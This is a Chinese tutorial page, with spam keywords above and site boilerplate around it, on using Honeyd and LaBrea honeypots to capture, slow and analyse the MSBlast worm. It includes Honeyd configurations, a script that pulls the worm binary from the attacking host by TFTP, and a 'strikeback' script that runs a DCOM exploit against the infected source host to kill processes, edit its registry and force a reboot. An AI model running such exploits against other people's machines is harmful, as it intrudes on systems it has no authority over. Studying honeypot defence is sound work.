免费看日本毛片,免费在线黄色网,日韩久久久久久久久久

網(wǎng)絡(luò)技術(shù)是從1990年代中期發(fā)展起來的新技術(shù)，它把互聯(lián)網(wǎng)上分散的資源融為有機(jī)整體，實(shí)現(xiàn)資源的全面共享和有機(jī)協(xié)作，使人們能夠透明地使用資源的整體能力并按需獲取信息。資源包括高性能計(jì)算機(jī)、存儲資源、數(shù)據(jù)資源、信息資源、知識資源、專家資源、大型數(shù)據(jù)庫、網(wǎng)絡(luò)、傳感器等。當(dāng)前的互聯(lián)網(wǎng)只限于信息共享，網(wǎng)絡(luò)則被認(rèn)為是互聯(lián)網(wǎng)發(fā)展的第三階段。

2003年夏天，對于運(yùn)行著Microsoft Windows的成千上萬臺主機(jī)來說簡直就是場噩夢！也給廣大網(wǎng)民留下了悲傷的回憶，這一些都?xì)w結(jié)于沖擊波蠕蟲的全世界范圍的傳播。這種事件也以不是第一次了，以往的Slammer, Code Red，Nimda 蠕蟲同樣也有著類似的破壞效果。

    這種蠕蟲會在被感染的機(jī)器上自己復(fù)制，以其達(dá)到通過蔓布因特網(wǎng)感染其他的機(jī)器的目的。導(dǎo)致了人們對網(wǎng)絡(luò)安全問題的重視。

    人們總是習(xí)慣于相同類型的系統(tǒng)與程序。這同達(dá)爾文的某個(gè)理論相似，單作的這使許多網(wǎng)絡(luò)安全專家畏懼連到因特網(wǎng)，而遭到一種新的惡意的蠕蟲的攻擊，如果最近的沖擊波能格式Windows 的機(jī)器的硬盤會是什么下場？雖然它沒這種效果，但它可以輕易的達(dá)到那種效果，

    隨著新的網(wǎng)絡(luò)攻擊的水平不斷提高，提出一個(gè)新的解決方案必須的。

    這篇文章是說用Honeypots 同Internet 蠕蟲作斗爭的方法，第一部分介紹討論關(guān)于傳播廣泛的蠕蟲的背景知識，然后，討論Honeypots 的一些實(shí)用的功能。最后，我們將搭建一個(gè)Honeypots來同Internet 蠕蟲作斗爭和反擊。最后，我們將展望一下未來的觀點(diǎn)。

        1.0 關(guān)于蠕蟲

    簡單點(diǎn)說，蠕蟲就是有著危害的代碼來攻擊網(wǎng)上的受害主機(jī)，并在受害主機(jī)上自我復(fù)制，再攻擊其他的受害主機(jī)的令人畏懼的實(shí)體。

    大多數(shù)時(shí)間，蠕蟲程序都是計(jì)算機(jī)黑客，網(wǎng)絡(luò)安全研究人員和病毒作者寫的。病毒傳染基于迷惑人脆弱的部分，通過社會工程學(xué)來傳播。比如，迷惑一個(gè)用戶敲擊一個(gè)電子郵件附件，以其達(dá)到目的。

    蠕蟲主要有三種主要特性：

感染：通過利用脆弱感染一個(gè)目標(biāo)。
潛伏：感染當(dāng)?shù)啬繕?biāo)遠(yuǎn)程主機(jī)。
傳播：影響的目標(biāo)，再感染其他的主機(jī)。

        2.0 關(guān)于 honeypots

    Honeypots是一個(gè)哄騙進(jìn)攻者的計(jì)算機(jī)。在一個(gè)網(wǎng)絡(luò)上，惡意的攻擊者將會攻擊偽造的系統(tǒng)，他們使盡一些方法得到的只是一些無關(guān)的信息。

    當(dāng)一個(gè)honeypot作為偽造的主機(jī)，常常哄騙進(jìn)攻者時(shí)，這就意味著所有的請求到honeypot都是可懷疑的，

    honeypots 經(jīng)常認(rèn)為用于被動分析時(shí)，他們也能起交互式作用來處理蠕蟲，兩種honeypots 經(jīng)常被使用。

  高級應(yīng)用：一種真正的主機(jī)通常幾乎犧牲（叫做傀儡主機(jī)），在一個(gè)網(wǎng)絡(luò)在等待任何進(jìn)攻者攻擊。
  低級應(yīng)用：服務(wù)器和/或主機(jī)是模擬的（例如Honeyd by Niels Provos）

        3.0 蜜罐同蠕蟲的對抗

  這章的目標(biāo)將是證明交互式honeypots 同蠕蟲作斗爭的優(yōu)勢，我們將明白怎么使用新的蜜罐技術(shù)來防御不同的階段期間的蠕蟲，

        3.1 蠕蟲與蠕蟲的感染

    蠕蟲感染的階段就是它在受害主機(jī)上自我復(fù)制攻擊其他的主機(jī)。

    在這個(gè)階段期間，作為防守者的蜜罐會檢測非法入侵者的行為。比如，監(jiān)視網(wǎng)絡(luò)，這項(xiàng)技術(shù)通常被稱為太公釣魚，愿者上鉤。防守者的蜜罐是一個(gè)建在網(wǎng)關(guān)上的，扮演著一個(gè)防火墻，或者入侵檢測系統(tǒng)（IDS），或者是入侵防御系統(tǒng)（IPS）。它過濾了通過網(wǎng)絡(luò)的流量，分析數(shù)據(jù)包的內(nèi)容。然后，如果網(wǎng)絡(luò)的地址同那些知名的攻擊的指紋是否相同，在檢驗(yàn)之后，網(wǎng)關(guān)將標(biāo)記一定時(shí)期內(nèi)的危害的源地址。因此，危害的數(shù)據(jù)包將被重定向到蜜罐中，而不是主網(wǎng)絡(luò)中。

    對于最近的沖擊波蠕蟲，如果網(wǎng)關(guān)機(jī)器對來自外部的TCP數(shù)據(jù)包請求本地135端口，被IDS進(jìn)行標(biāo)記。他將被重定向到蜜罐中。我們將在第3.3章中討論蜜罐未來的新功能。

      我們也發(fā)現(xiàn)了這門技術(shù)的缺點(diǎn)：

1，標(biāo)記總是晚于新的未知的攻擊，
2，這一概念是可靠的嗎？如果因?yàn)殄e(cuò)誤的配置而系統(tǒng)出錯(cuò)，將合法的數(shù)據(jù)包發(fā)到蜜罐中該怎么辦？
3，網(wǎng)絡(luò)速度因?yàn)榫W(wǎng)關(guān)的巨量的分析而被減慢。

        3.2 蜜罐與蠕蟲的潛伏

  蜜罐技術(shù)對于對付是非常有用的，特別是撲獲和分析它們。為了撲獲到一個(gè)蠕蟲，你可以讓一臺主機(jī)感染上，至少讓蠕蟲認(rèn)為已感染上了，在前一章了，我們看到我們能用蜜罐來轉(zhuǎn)向這些攻擊的流量。

  蜜罐也被稱為“傀儡主機(jī)”（一個(gè)正常的沒有打最新補(bǔ)丁的漏洞主機(jī)，有被入侵的可能性）�；蛘吣M一個(gè)服務(wù)，注意要讓她們在你的控制下不能在反彈感染其他的主機(jī)。如想獲得更多的信息，請參考Honeynet Project.的建議。

        3.2.1   受害主機(jī)

  使用一個(gè)受害主機(jī),安裝著原始的操作系統(tǒng)和一些適當(dāng)?shù)姆⻊?wù),也可以通過VMWare來安裝許多個(gè)操作系統(tǒng),來迷惑蠕蟲的攻擊.

  為了撲獲蠕蟲,受害主機(jī)等待被感染,以至于監(jiān)視網(wǎng)絡(luò)上的流量并發(fā)現(xiàn)蠕蟲.

        3.2.2 虛擬的主機(jī)和服務(wù)

    模擬這個(gè)虛擬的主機(jī)和服務(wù)，honeypot 通過偽造的服務(wù)能讓遠(yuǎn)程的蠕蟲進(jìn)行接觸。完成這種的程序叫做蜜罐

    為了描述這個(gè)方法，這里有一種方法來欺騙沖擊波蠕蟲的，它會欺騙沖擊波蠕蟲認(rèn)為對方的Windows 主機(jī)開放著135端口，并運(yùn)行著RPC DCOM 服務(wù)。

    這個(gè)簡單的配置通常能成功地發(fā)現(xiàn)在因特網(wǎng)上的沖擊波蠕蟲。

create default set default personality "Windows XP Pro"
add default tcp port 135 open
add default tcp port 4444 "/bin/sh scripts/WormCatcher.sh $ipsrc $ipdst"
set default tcp action block
set default udp action block

  這里有一個(gè)在Honeyd 發(fā)布的對每一個(gè)請求4444端口腳本程序。

!#/bin/sh
# Creation of a directory for every contaminated host
# attacking the honeypot, in order to archive different binaries
mkdir /tmp/$1-$2
# Download of the worm through TFTP in this directory
# (specific behaviour for MSBlast)
cd /tmp/$1-$2/
tftp $1 <<EOF
get msblast.exe
quit
EOF

    通過這種簡單的配置，我們能在沒有操作系統(tǒng)中發(fā)現(xiàn)沖擊波蠕蟲的攻擊。這項(xiàng)技術(shù)所以很實(shí)用.

        3.3 蜜罐與蠕蟲的傳播

        3.3.1 對蠕蟲請求的回應(yīng)

  當(dāng)一個(gè)蠕蟲想傳播是,會隨機(jī)攻擊一些IP.在這些目標(biāo)列表中,一些IP可能沒有被用.但其他的IP就會遭到蠕蟲的攻擊,如果一些IP對蠕蟲的攻擊沒有相應(yīng)的話,它們就會跳過這些IP攻擊其他的IP.

  當(dāng)一個(gè)蠕蟲攻擊一個(gè)不存在的主機(jī)時(shí),蜜罐就會偽裝信息讓蠕蟲攻擊它.

    比如,沖擊波會隨機(jī)選擇攻擊開了135端口的主機(jī).對沒有用的IP,我們可以設(shè)置蜜罐來誘撲沖擊波蠕蟲.要用到叫做arpd的demon.具體配置如下:

create default
set default personality "Windows XP Pro"
add default tcp port 135 open
set default tcp action block
set default udp action block

    有了這個(gè)配置,沖擊波蠕蟲就會對不存在運(yùn)行著蜜罐的IP進(jìn)行攻擊,蠕蟲會以為對方開著135端口的漏洞主機(jī).通過這門技術(shù),沖擊波蠕蟲就會被偽造的信息欺騙,達(dá)到拖延時(shí)間,進(jìn)而通知管理員,采取措施,對進(jìn)程中的程序進(jìn)行清理.避免遭到?jīng)_擊波的控制.

    如果一個(gè)新的蠕蟲設(shè)計(jì)過于復(fù)雜,這個(gè)蜜罐就不是那么好配置了.

        3.3.2 對蜜罐的緩慢的回應(yīng)

    繼續(xù)前一章的，蜜罐能監(jiān)視所進(jìn)來得請求的數(shù)據(jù)，使在網(wǎng)絡(luò)層的對蠕蟲的回應(yīng)減慢，這項(xiàng)技術(shù)以被使用，所用到的工具叫做Labrea。這個(gè)Unix daemon 能對未存在的IP作出回應(yīng)。為了模擬對攻擊者的TCP session。它使用合法的RFC的文檔，來最大化的拖延TCP session的時(shí)間。為了避免蠕蟲的攻擊，TCP window size 始終保持為0。

    通常下蠕蟲都是以一個(gè)進(jìn)程在受害主機(jī)上的。在內(nèi)核中使用classic network calls來到處傳播，在用戶的領(lǐng)域使用classic API。蠕蟲不知道網(wǎng)絡(luò)為什么運(yùn)行這么慢，它會減慢并阻塞偽造的目標(biāo)。

    作為實(shí)驗(yàn)，Labrea已成功地戰(zhàn)勝了紅色代碼蠕蟲，它也可能對付其他的蠕蟲攻擊。在未來的Honeyd 系統(tǒng)中將添加這樣的功能。

    盡管這種防守體系有很多缺點(diǎn)，比如多線程的蠕蟲或未意識到的蠕蟲會同時(shí)攻擊一些目標(biāo)，而不會阻塞我們偽造的目標(biāo)。

        3.3.3 我們應(yīng)采取什么反擊措施

  一些已發(fā)布的反擊措施

  *孤立一些主機(jī)
  *關(guān)閉蠕蟲敏感的遠(yuǎn)程的服務(wù)
  *對遠(yuǎn)程設(shè)備（路由器，防火墻等等）制定合適的流量監(jiān)控

        3.3.4 Launching a counter offensive

    這里有一個(gè)通過Honeyd配置的例子，

create default
set default personality "Windows XP Pro"
add default tcp port 135 open
add default tcp port 4444 "/bin/sh scripts/strikeback.sh $ipsrc"
set default tcp action block
set default udp action block

  蜜罐的TCP 135端口開著，并接受沖擊波蠕蟲的攻擊，幸運(yùn)的是，蠕蟲沒有檢查RPC 回應(yīng)的完整。因此，蜜罐經(jīng)過三次握手的過程，來檢測非法的數(shù)據(jù)包。

  然后，我們添加一個(gè)4444端口服務(wù)，它可以讓沖擊波獲得遠(yuǎn)程的SHELL，包括通過TFTP來執(zhí)行下載代碼。這個(gè)偽造的SHELL將通過一個(gè)叫做strikeback.sh來欺騙蠕蟲。

  以下是運(yùn)行在Windows XP Pro系統(tǒng)下的strikeback.sh程序，

!#/bin/sh
# Launches a DCOM exploit toward the infected attacking host
# and then run cleaning commands in the remote DOS shell obtained
./dcom_exploit -d $1 << EOF
REM Executes the following orders on the host :
REM 1) Kill the running process MSBlast.exe
taskkill /f /im msblast.exe /t
REM 2) Eliminate the binary of the worm
del /f %SystemRoot%system32msblast.exe
REM 3) Clean the registry
echo Regedit4 > c: cleanerMSB.reg
echo [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]   >> c:cleanerMSB.reg
echo "auto windows update" = "REM msblast.exe" >> c: cleanerMSB.reg
regedit /s c: cleanerMSB.reg
del /f c:cleanerMSB.reg
REM N) Specific actions to update the Windows host could be added here
REM N+1) Reboot the host
shutdown -r -f -t 0 exit
EOF

        4.0 總結(jié)

  蜜罐技術(shù)已成為對抗蠕蟲的有效措施。它們把蠕蟲的流量重定向到偽造的主機(jī)上，以至于撲獲到蠕蟲并分析它們的特征，來限制蠕蟲在網(wǎng)絡(luò)上的傳播。

網(wǎng)絡(luò)的神奇作用吸引著越來越多的用戶加入其中，正因如此，網(wǎng)絡(luò)的承受能力也面臨著越來越嚴(yán)峻的考驗(yàn)―從硬件上、軟件上、所用標(biāo)準(zhǔn)上......，各項(xiàng)技術(shù)都需要適時(shí)應(yīng)勢，對應(yīng)發(fā)展，這正是網(wǎng)絡(luò)迅速走向進(jìn)步的催化劑。

溫馨提示：喜歡本站的話，請收藏一下本站！

當(dāng)前位置:蘿卜系統(tǒng) > 網(wǎng)絡(luò)技術(shù)教程 > 詳細(xì)頁面

運(yùn)用Honeypots同Internet蠕蟲作斗爭

本類教程下載

系統(tǒng)下載排行